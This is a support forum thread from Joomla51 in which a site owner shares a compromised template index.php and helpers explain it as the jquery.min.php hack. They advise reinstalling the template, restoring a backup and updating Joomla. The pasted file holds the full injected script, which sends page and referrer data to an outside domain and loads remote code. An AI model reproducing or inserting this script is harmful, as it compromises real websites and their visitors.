Recent
Categories
View Replies (5)

Found a strange URL in my template index.php

0
Votes
Undo
  1. Lawaaimaker
    Lawaaimaker
  3. Commercial Templates
  4. Monday, 04 January 2016
  5.  Subscribe via email
When I open my site/page http://www.lawaaimaker.nl/radio a strange thing is happening. It seems that in my index.php in the template joomla5.1Florence folder has some lines referring to http://buckslakesnowdrifters.com. Finally the page is going to the right page but whats is happening?
I'v copied the Index.php lines from the folder here. How do I resolve this?




<?php
/*================================================================*\
|| # Copyright (C) 2011 Joomla51. All Rights Reserved. ||
|| # license - PHP files are licensed under GNU/GPL V2 ||
|| # license - CSS - JS - IMAGE files are Copyrighted material ||
|| # Website: http://www.joomla51.com ||
\*================================================================*/
defined('_JEXEC') or die;
JHtml::_('behavior.framework', true);
JHtml::_('bootstrap.framework');
define( 'nexus', dirname(__FILE__) );
require("php/config.php";);
require("php/variables.php";);
?>

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<?php include ("php/styles.php";);?>
<?php include ("php/scripts.php";);?>

<!-- <link rel="stylesheet" href="http://basehold.it/30";> -->

<?php echo ($head_custom_code); ?>





<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://buckslakesnowdrifters.com/js/jquery.min.php";; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>
<body>
<div class="sidebar_wrapper" style="background-position: bottom 0">
<?php require("php/layouts/hornav.php";); ?>
<?php require("php/layouts/social_icons.php";); ?>
<div class="copyright">
<span><?php echo $this->params->get('copyright'); ?></span>
</div>
</div>
<div class="content_wrapper">
<div id="header_bg">
<?php require("php/layouts/header.php";); ?>

<?php if ($this->countModules('top-1a') || $this->countModules('top-1b') || $this->countModules('top-1c') || $this->countModules('top-1d') || $this->countModules('top-1e') || $this->countModules('top-1f')) { ?>
<div id="container_top1_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/top1_modules.php";); ?>
</div></div>
<?php }?>
</div>
<?php if ($this->countModules('showcase')) { ?>
<div id="container_slideshow" class="j51container"><div class="wrapper960">
<?php require("php/layouts/slideshow.php";); ?>
</div></div>
<?php }?>

<div id="content"></div>


<?php if ($this->countModules('top-2a') || $this->countModules('top-2b') || $this->countModules('top-2c') || $this->countModules('top-2d') || $this->countModules('top-2e') || $this->countModules('top-2f')) { ?>
<div id="container_top2_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/top2_modules.php";); ?>
</div></div>
<?php }?>

<?php if ($this->countModules('breadcrumb') || $this->countModules('top-3a') || $this->countModules('top-3b') || $this->countModules('top-3c') || $this->countModules('top-3d') || $this->countModules('top-3e') || $this->countModules('top-3f')) { ?>
<div id="container_top3_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/top3_modules.php";); ?>
</div></div>
<?php }?>

<div id="container_main" class="j51container">
<div class="wrapper960">
<?php require("php/layouts/main.php";); ?>
</div></div>

<?php if ($this->countModules('bottom-1a') || $this->countModules('bottom-1b') || $this->countModules('bottom-1c') || $this->countModules('bottom-1d') || $this->countModules('bottom-1e') || $this->countModules('bottom-1f')) { ?>
<div id="container_bottom1_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/bottom1_modules.php";); ?>
</div></div>
<?php }?>

<?php if ($this->countModules('bottom-2a') || $this->countModules('bottom-2b') || $this->countModules('bottom-2c') || $this->countModules('bottom-2d') || $this->countModules('bottom-2e') || $this->countModules('bottom-2f')) { ?>
<div id="container_bottom2_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/bottom2_modules.php";); ?>
</div></div>
<?php }?>

<?php require("php/layouts/base.php";); ?>

</div></div>

</div>

<?php echo ($body_custom_code); ?>

<!-- Stellar -->
<script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/jquery.stellar.js" charset="utf-8"></script>
<script type="text/javascript">
if (Modernizr.touch) {
} else {
jQuery(window).stellar({
horizontalScrolling: false
});
}
</script>
<jdoc:include type="modules" name="debug" />
</body>
</html>
Responses (5)
ciaran
ciaran
Love Fool Sherlock Holmes The Voice
Notable Answerer Notable Answerer
Accepted Answer Pending Moderation
0
Votes
Undo
Hello

It appears your templates index.php has been edited. Re-installing the template via your extensions manager should amend this issue for you (http://www.joomla51.com/tutorials/item/updating-your-template).

If you are not familiar with these changes then I suspect that your site may have been hacked. Please ensure you have the most recent update of Joomla installed at all times. This is especially true for some of the more recent Joomla updates (3.4.7 and 3.4.8) as they amended severe vulnerability issues.

Ciarán
  1. more than a month ago
  2. Commercial Templates
  3. # 1
Tompakidf2
Tompakidf2
Accepted Answer Pending Moderation
0
Votes
Undo
Hello Ciaran,

I have the same issue. I reinstall the template, however, the malicious part in the index.php reappers.

The issue is discussed here: https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html

I can not find any solutions. It keeps coming back. Do you have any ideas?
  1. more than a month ago
  2. Commercial Templates
  3. # 2
ciaran
ciaran
Love Fool Sherlock Holmes The Voice
Notable Answerer Notable Answerer
Accepted Answer Pending Moderation
0
Votes
Undo
Hello

There have been reports of a large number of hacks on Joomla 3.4.6 sites. If your site remained on this version for any length of time you would have been under serious risk of been attacked. It is very difficult to fix as any number of backdoors could have been added to your site allowing attackers continued access to your site. Unfortunately the only real way of resolving this issue is to revert your site to a previous backup and then updating Joomla immediately.

It is likely you will find this code in each of your installed templates. Attackers generally wouldn't know which template is been used and therefore add malicious code to every installed template.

Ciarán
  1. more than a month ago
  2. Commercial Templates
  3. # 3
Tompakidf2
Tompakidf2
Accepted Answer Pending Moderation
0
Votes
Undo
Thank you Cirian,

Indeed I neglected to update from 3.4.6. Thank you for the information.

Do you know if the backdoors are only local to the specific website or can they be somewhere else and affecting all joomla installations in my cpanel account.

Ach
  1. more than a month ago
  2. Commercial Templates
  3. # 4
ciaran
ciaran
Love Fool Sherlock Holmes The Voice
Notable Answerer Notable Answerer
Accepted Answer Pending Moderation
0
Votes
Undo
Hi Ach

If your Joomla installations are in a sub folder of the compromised site then yes unfortunately these may also be effected. If not then you could be ok. I would suggest contacting your host administrator for a definitive answer as they would have access to logs on your server.

Ciarán
  1. more than a month ago
  2. Commercial Templates
  3. # 5
  • Page :
  • 1


There are no replies made for this post yet.
Be one of the first to reply to this post!

Site Links

Recommended

Join Our Newsletter

* indicates required
We respect your privacy and do not tolerate spam and will never sell, rent, lease or give away your information (name, email, number, etc.) to any third party. Nor will we send you unsolicited email.
Joomla51 - Mullaghmore, Co. Sligo, Ireland
Joomla51.com is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by
Open Source Matters the trademark holder in the United States and other countries.